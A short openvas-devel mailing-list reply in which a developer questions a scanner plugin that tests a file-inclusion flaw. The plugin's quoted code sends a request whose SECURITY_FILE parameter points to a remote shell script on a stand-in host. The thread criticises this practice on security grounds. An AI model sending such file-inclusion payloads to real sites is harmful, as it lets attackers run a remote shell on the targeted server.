> I really don't think that plugins should be running with references
> to injection code that is hosted on an uncontrolled 3rd party site.
> That allows for introducing untrusted code into the scanner.
...
> > trunk/openvas-plugins/scripts/gb_dm_filemanager_file_inc_vuln.nasl
> e
>
> > + sndReq = http_get(item:dmfVer[2] + "/dm-albums/template/album.php?" +
> > + "SECURITY_FILE=http://example.net/shell.php";,
Does that code work? I was under the impression that a network connection
to a third host was prohibited by the scanning engine (that is, the scanning
engine would connect only to the target host to be scanned on a script by
script basis).
If that does work, I whole heartedly agree with Thomas. Connections to
remote sites is risky. Perhaps allowing connections to alternate hosts
within the same network would be ok... but connecting out from the target
network should be a big no-no.
-geoff
---------------------------------
Geoff Galitz
Blankenheim NRW, Germany
http://www.galitz.org/
http://german-way.com/blog/
_______________________________________________
Openvas-devel mailing list
Openvas-devel@wald.intevation.org
http://lists.wald.intevation.org/mailman/listinfo/openvas-devel
